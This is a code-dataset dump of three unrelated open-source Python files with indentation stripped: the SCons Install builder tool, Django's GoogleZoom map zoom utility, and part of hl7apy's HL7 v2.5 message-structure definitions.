def installFuncVersionedLib(target, source, env):
"""Install a versioned library into a target using the function specified
as the INSTALLVERSIONEDLIB construction variable."""
try:
install = env['INSTALLVERSIONEDLIB']
except KeyError:
raise SCons.Errors.UserError('Missing INSTALLVERSIONEDLIB construction variable.')
assert len(target)==len(source), \
"Installing source %s into target %s: target and source lists must have same length."%(list(map(str, source)), list(map(str, target)))
for t,s in zip(target,source):
if hasattr(t.attributes, 'shlibname'):
tpath = os.path.join(t.get_dir(), t.attributes.shlibname)
else:
tpath = t.get_path()
if install(tpath,s.get_path(),env):
return 1
return 0
def stringFunc(target, source, env):
installstr = env.get('INSTALLSTR')
if installstr:
return env.subst_target_source(installstr, 0, target, source)
target = str(target[0])
source = str(source[0])
if os.path.isdir(source):
type = 'directory'
else:
type = 'file'
return 'Install %s: "%s" as "%s"' % (type, source, target)
#
# Emitter functions
#
def add_targets_to_INSTALLED_FILES(target, source, env):
""" An emitter that adds all target files to the list stored in the
_INSTALLED_FILES global variable. This way all installed files of one
scons call will be collected.
"""
global _INSTALLED_FILES, _UNIQUE_INSTALLED_FILES
_INSTALLED_FILES.extend(target)
_UNIQUE_INSTALLED_FILES = None
return (target, source)
def add_versioned_targets_to_INSTALLED_FILES(target, source, env):
""" An emitter that adds all target files to the list stored in the
_INSTALLED_FILES global variable. This way all installed files of one
scons call will be collected.
"""
global _INSTALLED_FILES, _UNIQUE_INSTALLED_FILES
Verbose = False
_INSTALLED_FILES.extend(target)
if Verbose:
print("add_versioned_targets_to_INSTALLED_FILES: target={!r}".format(list(map(str, target))))
symlinks = listShlibLinksToInstall(target[0], source, env)
if symlinks:
EmitLibSymlinks(env, symlinks, target[0])
_UNIQUE_INSTALLED_FILES = None
return (target, source)
class DESTDIR_factory:
""" A node factory, where all files will be relative to the dir supplied
in the constructor.
"""
def __init__(self, env, dir):
self.env = env
self.dir = env.arg2nodes( dir, env.fs.Dir )[0]
def Entry(self, name):
name = SCons.Util.make_path_relative(name)
return self.dir.Entry(name)
def Dir(self, name):
name = SCons.Util.make_path_relative(name)
return self.dir.Dir(name)
#
# The Builder Definition
#
install_action = SCons.Action.Action(installFunc, stringFunc)
installas_action = SCons.Action.Action(installFunc, stringFunc)
installVerLib_action = SCons.Action.Action(installFuncVersionedLib, stringFunc)
BaseInstallBuilder = None
def InstallBuilderWrapper(env, target=None, source=None, dir=None, **kw):
if target and dir:
import SCons.Errors
raise SCons.Errors.UserError("Both target and dir defined for Install(), only one may be defined.")
if not dir:
dir=target
import SCons.Script
install_sandbox = SCons.Script.GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
try:
dnodes = env.arg2nodes(dir, target_factory.Dir)
except TypeError:
raise SCons.Errors.UserError("Target `%s' of Install() is a file, but should be a directory. Perhaps you have the Install() arguments backwards?" % str(dir))
sources = env.arg2nodes(source, env.fs.Entry)
tgt = []
for dnode in dnodes:
for src in sources:
# Prepend './' so the lookup doesn't interpret an initial
# '#' on the file name portion as meaning the Node should
# be relative to the top-level SConstruct directory.
target = env.fs.Entry('.'+os.sep+src.name, dnode)
tgt.extend(BaseInstallBuilder(env, target, src, **kw))
return tgt
def InstallAsBuilderWrapper(env, target=None, source=None, **kw):
result = []
for src, tgt in map(lambda x, y: (x, y), source, target):
result.extend(BaseInstallBuilder(env, tgt, src, **kw))
return result
BaseVersionedInstallBuilder = None
def InstallVersionedBuilderWrapper(env, target=None, source=None, dir=None, **kw):
if target and dir:
import SCons.Errors
raise SCons.Errors.UserError("Both target and dir defined for Install(), only one may be defined.")
if not dir:
dir=target
import SCons.Script
install_sandbox = SCons.Script.GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
try:
dnodes = env.arg2nodes(dir, target_factory.Dir)
except TypeError:
raise SCons.Errors.UserError("Target `%s' of Install() is a file, but should be a directory. Perhaps you have the Install() arguments backwards?" % str(dir))
sources = env.arg2nodes(source, env.fs.Entry)
tgt = []
for dnode in dnodes:
for src in sources:
# Prepend './' so the lookup doesn't interpret an initial
# '#' on the file name portion as meaning the Node should
# be relative to the top-level SConstruct directory.
target = env.fs.Entry('.'+os.sep+src.name, dnode)
tgt.extend(BaseVersionedInstallBuilder(env, target, src, **kw))
return tgt
added = None
def generate(env):
from SCons.Script import AddOption, GetOption
global added
if not added:
added = 1
AddOption('--install-sandbox',
dest='install_sandbox',
type="string",
action="store",
help='A directory under which all installed files will be placed.')
global BaseInstallBuilder
if BaseInstallBuilder is None:
install_sandbox = GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
BaseInstallBuilder = SCons.Builder.Builder(
action = install_action,
target_factory = target_factory.Entry,
source_factory = env.fs.Entry,
multi = 1,
emitter = [ add_targets_to_INSTALLED_FILES, ],
source_scanner = SCons.Scanner.Base( {}, name = 'Install', recursive = False ),
name = 'InstallBuilder')
global BaseVersionedInstallBuilder
if BaseVersionedInstallBuilder is None:
install_sandbox = GetOption('install_sandbox')
if install_sandbox:
target_factory = DESTDIR_factory(env, install_sandbox)
else:
target_factory = env.fs
BaseVersionedInstallBuilder = SCons.Builder.Builder(
action = installVerLib_action,
target_factory = target_factory.Entry,
source_factory = env.fs.Entry,
multi = 1,
emitter = [ add_versioned_targets_to_INSTALLED_FILES, ],
name = 'InstallVersionedBuilder')
env['BUILDERS']['_InternalInstall'] = InstallBuilderWrapper
env['BUILDERS']['_InternalInstallAs'] = InstallAsBuilderWrapper
env['BUILDERS']['_InternalInstallVersionedLib'] = InstallVersionedBuilderWrapper
# We'd like to initialize this doing something like the following,
# but there isn't yet support for a ${SOURCE.type} expansion that
# will print "file" or "directory" depending on what's being
# installed. For now we punt by not initializing it, and letting
# the stringFunc() that we put in the action fall back to the
# hand-crafted default string if it's not set.
#
#try:
# env['INSTALLSTR']
#except KeyError:
# env['INSTALLSTR'] = 'Install ${SOURCE.type}: "$SOURCES" as "$TARGETS"'
try:
env['INSTALL']
except KeyError:
env['INSTALL'] = copyFunc
try:
env['INSTALLVERSIONEDLIB']
except KeyError:
env['INSTALLVERSIONEDLIB'] = copyFuncVersionedLib
def exists(env):
return 1
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mdj2/django
|
refs/heads/master
|
django/contrib/gis/maps/google/zoom.py
|
224
|
from django.contrib.gis.geos import GEOSGeometry, LinearRing, Polygon, Point
from django.contrib.gis.maps.google.gmap import GoogleMapException
from django.utils.six.moves import xrange
from math import pi, sin, log, exp, atan
# Constants used for degree to radian conversion, and vice-versa.
DTOR = pi / 180.
RTOD = 180. / pi
class GoogleZoom(object):
"""
GoogleZoom is a utility for performing operations related to the zoom
levels on Google Maps.
This class is inspired by the OpenStreetMap Mapnik tile generation routine
`generate_tiles.py`, and the article "How Big Is the World" (Hack #16) in
"Google Maps Hacks" by Rich Gibson and Schuyler Erle.
`generate_tiles.py` may be found at:
http://trac.openstreetmap.org/browser/applications/rendering/mapnik/generate_tiles.py
"Google Maps Hacks" may be found at http://safari.oreilly.com/0596101619
"""
def __init__(self, num_zoom=19, tilesize=256):
"Initializes the Google Zoom object."
# Google's tilesize is 256x256, square tiles are assumed.
self._tilesize = tilesize
# The number of zoom levels
self._nzoom = num_zoom
# Initializing arrays to hold the parameters for each one of the
# zoom levels.
self._degpp = [] # Degrees per pixel
self._radpp = [] # Radians per pixel
self._npix = [] # 1/2 the number of pixels for a tile at the given zoom level
# Incrementing through the zoom levels and populating the parameter arrays.
z = tilesize # The number of pixels per zoom level.
for i in xrange(num_zoom):
# Getting the degrees and radians per pixel, and the 1/2 the number of
# for every zoom level.
self._degpp.append(z / 360.) # degrees per pixel
self._radpp.append(z / (2 * pi)) # radians per pixel
self._npix.append(z / 2) # number of pixels to center of tile
# Multiplying `z` by 2 for the next iteration.
z *= 2
def __len__(self):
"Returns the number of zoom levels."
return self._nzoom
def get_lon_lat(self, lonlat):
"Unpacks longitude, latitude from GEOS Points and 2-tuples."
if isinstance(lonlat, Point):
lon, lat = lonlat.coords
else:
lon, lat = lonlat
return lon, lat
def lonlat_to_pixel(self, lonlat, zoom):
"Converts a longitude, latitude coordinate pair for the given zoom level."
# Setting up, unpacking the longitude, latitude values and getting the
# number of pixels for the given zoom level.
lon, lat = self.get_lon_lat(lonlat)
npix = self._npix[zoom]
# Calculating the pixel x coordinate by multiplying the longitude value
# with with the number of degrees/pixel at the given zoom level.
px_x = round(npix + (lon * self._degpp[zoom]))
# Creating the factor, and ensuring that 1 or -1 is not passed in as the
# base to the logarithm. Here's why:
# if fac = -1, we'll get log(0) which is undefined;
# if fac = 1, our logarithm base will be divided by 0, also undefined.
fac = min(max(sin(DTOR * lat), -0.9999), 0.9999)
# Calculating the pixel y coordinate.
px_y = round(npix + (0.5 * log((1 + fac)/(1 - fac)) * (-1.0 * self._radpp[zoom])))
# Returning the pixel x, y to the caller of the function.
return (px_x, px_y)
def pixel_to_lonlat(self, px, zoom):
"Converts a pixel to a longitude, latitude pair at the given zoom level."
if len(px) != 2:
raise TypeError('Pixel should be a sequence of two elements.')
# Getting the number of pixels for the given zoom level.
npix = self._npix[zoom]
# Calculating the longitude value, using the degrees per pixel.
lon = (px[0] - npix) / self._degpp[zoom]
# Calculating the latitude value.
lat = RTOD * ( 2 * atan(exp((px[1] - npix)/ (-1.0 * self._radpp[zoom]))) - 0.5 * pi)
# Returning the longitude, latitude coordinate pair.
return (lon, lat)
def tile(self, lonlat, zoom):
"""
Returns a Polygon corresponding to the region represented by a fictional
Google Tile for the given longitude/latitude pair and zoom level. This
tile is used to determine the size of a tile at the given point.
"""
# The given lonlat is the center of the tile.
delta = self._tilesize / 2
# Getting the pixel coordinates corresponding to the
# the longitude/latitude.
px = self.lonlat_to_pixel(lonlat, zoom)
# Getting the lower-left and upper-right lat/lon coordinates
# for the bounding box of the tile.
ll = self.pixel_to_lonlat((px[0]-delta, px[1]-delta), zoom)
ur = self.pixel_to_lonlat((px[0]+delta, px[1]+delta), zoom)
# Constructing the Polygon, representing the tile and returning.
return Polygon(LinearRing(ll, (ll[0], ur[1]), ur, (ur[0], ll[1]), ll), srid=4326)
def get_zoom(self, geom):
"Returns the optimal Zoom level for the given geometry."
# Checking the input type.
if not isinstance(geom, GEOSGeometry) or geom.srid != 4326:
raise TypeError('get_zoom() expects a GEOS Geometry with an SRID of 4326.')
# Getting the envelope for the geometry, and its associated width, height
# and centroid.
env = geom.envelope
env_w, env_h = self.get_width_height(env.extent)
center = env.centroid
for z in xrange(self._nzoom):
# Getting the tile at the zoom level.
tile_w, tile_h = self.get_width_height(self.tile(center, z).extent)
# When we span more than one tile, this is an approximately good
# zoom level.
if (env_w > tile_w) or (env_h > tile_h):
if z == 0:
raise GoogleMapException('Geometry width and height should not exceed that of the Earth.')
return z-1
# Otherwise, we've zoomed in to the max.
return self._nzoom-1
def get_width_height(self, extent):
"""
Returns the width and height for the given extent.
"""
# Getting the lower-left, upper-left, and upper-right
# coordinates from the extent.
ll = Point(extent[:2])
ul = Point(extent[0], extent[3])
ur = Point(extent[2:])
# Calculating the width and height.
height = ll.distance(ul)
width = ul.distance(ur)
return width, height
|
crs4/hl7apy
|
refs/heads/develop
|
hl7apy/v2_5/messages.py
|
1
|
from .groups import GROUPS
from .segments import SEGMENTS
MESSAGES = {
'ACK': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),)),
'ADR_A19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('ADR_A19_QUERY_RESPONSE', GROUPS['ADR_A19_QUERY_RESPONSE'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ADT_A01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A01_PROCEDURE', GROUPS['ADT_A01_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A01_INSURANCE', GROUPS['ADT_A01_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A03_PROCEDURE', GROUPS['ADT_A03_PROCEDURE'], (0, -1), 'GRP'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A03_INSURANCE', GROUPS['ADT_A03_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('PDA', SEGMENTS['PDA'], (0, 1), 'SEG'),)),
'ADT_A05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A05_PROCEDURE', GROUPS['ADT_A05_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A05_INSURANCE', GROUPS['ADT_A05_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),)),
'ADT_A06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('MRG', SEGMENTS['MRG'], (0, 1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A06_PROCEDURE', GROUPS['ADT_A06_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A06_INSURANCE', GROUPS['ADT_A06_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),
('UB1', SEGMENTS['UB1'], (0, 1), 'SEG'),
('UB2', SEGMENTS['UB2'], (0, 1), 'SEG'),)),
'ADT_A09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),)),
'ADT_A12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, 1), 'SEG'),)),
'ADT_A15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),)),
'ADT_A16': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('NK1', SEGMENTS['NK1'], (0, -1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('ROL', SEGMENTS['ROL'], (0, -1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('AL1', SEGMENTS['AL1'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),
('ADT_A16_PROCEDURE', GROUPS['ADT_A16_PROCEDURE'], (0, -1), 'GRP'),
('GT1', SEGMENTS['GT1'], (0, -1), 'SEG'),
('ADT_A16_INSURANCE', GROUPS['ADT_A16_INSURANCE'], (0, -1), 'GRP'),
('ACC', SEGMENTS['ACC'], (0, 1), 'SEG'),)),
'ADT_A17': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),)),
'ADT_A18': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),)),
'ADT_A20': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('NPU', SEGMENTS['NPU'], (1, 1), 'SEG'),)),
'ADT_A21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),)),
'ADT_A24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),)),
'ADT_A30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),)),
'ADT_A37': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),)),
'ADT_A38': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),
('DB1', SEGMENTS['DB1'], (0, -1), 'SEG'),
('OBX', SEGMENTS['OBX'], (0, -1), 'SEG'),
('DG1', SEGMENTS['DG1'], (0, -1), 'SEG'),
('DRG', SEGMENTS['DRG'], (0, 1), 'SEG'),)),
'ADT_A39': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('ADT_A39_PATIENT', GROUPS['ADT_A39_PATIENT'], (1, -1), 'GRP'),)),
'ADT_A43': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('ADT_A43_PATIENT', GROUPS['ADT_A43_PATIENT'], (1, -1), 'GRP'),)),
'ADT_A45': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ADT_A45_MERGE_INFO', GROUPS['ADT_A45_MERGE_INFO'], (1, -1), 'GRP'),)),
'ADT_A50': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('MRG', SEGMENTS['MRG'], (1, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),)),
'ADT_A52': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('PV1', SEGMENTS['PV1'], (1, 1), 'SEG'),
('PV2', SEGMENTS['PV2'], (0, 1), 'SEG'),)),
'ADT_A54': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
